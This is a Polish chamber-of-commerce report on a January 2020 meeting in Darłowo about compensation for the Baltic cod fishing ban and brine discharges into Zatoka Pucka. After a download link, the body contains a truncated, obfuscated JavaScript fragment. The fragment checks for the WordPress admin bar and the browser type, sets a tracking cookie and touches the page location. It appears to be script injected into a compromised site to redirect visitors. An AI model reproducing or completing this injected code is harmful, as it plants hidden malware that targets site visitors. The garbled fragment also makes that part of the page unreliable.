Zamknięcie Morza Bałtyckiego do 2026 r. – relacja po spotkaniu | Północna Izba Gospodarcza w Koszalinie

W dniu 30 stycznia 2020 r. o godzinie 11.00 w Urzędzie Miejskim w Darłowie odbyło się trzecie spotkanie projektu Extra SME dla branży akwakultury. W spotkaniu roboczym udział wzięli posłowie w tym m.in. Małgorzata Prokop-Paczkowska, Czesław Hoc oraz Piotr Zientarski oraz przedstawiciele rybołówstwa, przetwórców, związkowców, sympatyków branży rybołówstwa, a także media.

Zebranych powitał Burmistrz Miasta Darłowa Pan Arkadiusz Klimowicz, a następnie Pan Prezes Roman Biłas, który później moderował dyskusję. Celem spotkania było wypracowanie możliwości dotyczących wypłaty rekompensat i odszkodowań z tytułu wprowadzenia zakazu przez Komisję Europejską połowu dorsza, która dotyczy wiele firm z regionu całego Pomorza.

Na początku Pan Grzegorz Chałubek, prezes Związku Rybaków Polskich przedstawił aktualny stan Morza Bałtyckiego, z którego wynika, że istnieje niedobór związków, które są niezbędne dla rozwoju organizmów znajdujących u podstawy piramidy żywienia organizmów morskich. Dodatkowo w czasie prelekcji rybacy z Zatoki Puckiej zwrócili uwagę na zwiększenie zanieczyszczenia wód, które mają miejsce od 2012 roku.

W dalszej części spotkania omówiono możliwości wsparcia dla wszystkich interesariuszy branży rybołówstwa. Podkreślono, iż należy włączyć w rekompensaty również przetwórców ryb i dostawców bezpośrednich materiałów związanych z połowem. Jeżeli branża przetwórstwa nie zostanie objęta w tym, działaniu w szybkim tempie Polskie firmy, których nie będzie stać na utrzymywanie pracowników, bez przychodów, będą wykupowane przez podmioty zagraniczne.

Pan Andrzej Antosik, Prezes Zarządu Bałtyckiego Stowarzyszenia Wędkarstwa Morskiego zaproponował, aby uruchomić Narodowy Program Naprawczy Rybołówstwa Morskiego oraz utworzyć nadzwyczajny Funduszu Rekompensat dla firm dotkniętych bezpośrednio
i pośrednio zakazem połowu dorsza z tytułu utraty przychodu.

W związku z wypłukiwaniem komór solnych  i wpuszczaniem dużych ilości solanki (10 komór po 1,4 mln ton = 14,2 mln ton soli) do Zatoki Puckiej w m. Mechelinki, od 2011 r., w imieniu strony społecznej i Stowarzyszenia Ekologiczno-Kulturowego „Nasza Ziemia” Pan Władysław Wróblewski, emerytowany geofizyk, – wyższy dozór górniczy, zgłosił następujące wnioski:

  1. Ze względu na znaczący wpływ na środowisko naturalne, natychmiastowe wstrzymanie zrzutu solanki (mieszanina solanki i ścieków komunalnych) do Zatoki Puckiej do czasu opracowania alternatywnej metody jej zagospodarowania, np. poprzez odparowywanie
    i przeznaczenie soli do celów, jeśli nie spożywczych – spora zawartość metali ciężkich, to przynajmniej gospodarczych.
  2. W przypadku niemożności spełnienia pkt. 1., wywóz solanki na pełne morze, powyżej półwyspu Hel – wersja optymalna lub opcjonalnie przeprowadzenie rurociągu poza półwysep na wysokości m. Władysławowo.
  3. Na dziś, przeprowadzenie badań osadów dennych a także badań tkanki miękkiej padłych zwierząt t.j. fok, łabędzi i. inn. na obecność toksycznych metali, półmetali i niemetali.

Pan poseł Czesław Hoc zaproponował zwołanie Sejmowej Komisji Morskiej, która powinna również uwzględnić propozycje.

Pan Marcin Buchna Prezes Stowarzyszenia „Nasza Ziemia – Nasza Ziemia” podsumowując przypomniał, że w rybołówstwie nie chodzi jedynie o zarobek ale również o zabezpieczenie dziedzictwa kulturowego.

W końcowej części spotkania Pan Prezes Północnej Izby Gospodarczej w Koszalinie zadeklarował przygotowanie i wysyłkę pisma do Ministra Gospodarki Morskiej i Żeglugi Śródlądowej Pana Marka Gróbarczyka z następującymi pytaniami:

  1. Czy wystąpiono do Komisji Europejskiej o środki pomocowe i odszkodowania z Europejskiego Funduszu Morskiego i Rybołówstwa dla branży morskiej?
  2. Czy ustalony jest model i regulamin wypłat rekompensat i odszkodowań dla branży morskiej w tym rybaków, armatorów, przetwórców rybnych i wszystkich interesariuszy których zakaz połowu dorsza dotyczy?
  3. Czy określono wszystkich interesariuszy branży którzy zostali dotknięci bezpośrednio i pośrednio zakazem połowu?
  4. Czy są ustalone przyszłe zasady lub strategia ochrony Morza Bałtyckiego i rozwoju akwakultury na Morzu Bałtyckim?

A także o zwrócenie się do Pana Ministra o utworzenie zespołu doradców z przedstawicieli branży rybołówstwa o utworzenie zespołu doradców z składającego się m.in. z czynnych zawodowo rybaków oraz armatorów, którzy mają wypracowane doświadczenie oraz wiedzę z aktualnego stanu sytuacji surowca na Morzu Bałtyckim.

Materiały w wersji do pobrania:

MGMiŻŚ zaproszenie i pytania od branży rybołówstwa

Raport z III spotkania Extra SME 30.01.2020 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m

Odpowiedź MGMiŻŚ
w formie pdf to pobrania: Odpowiedź Ministerstwa Gospodarki Morskiej i Żeglugi Śródlądowej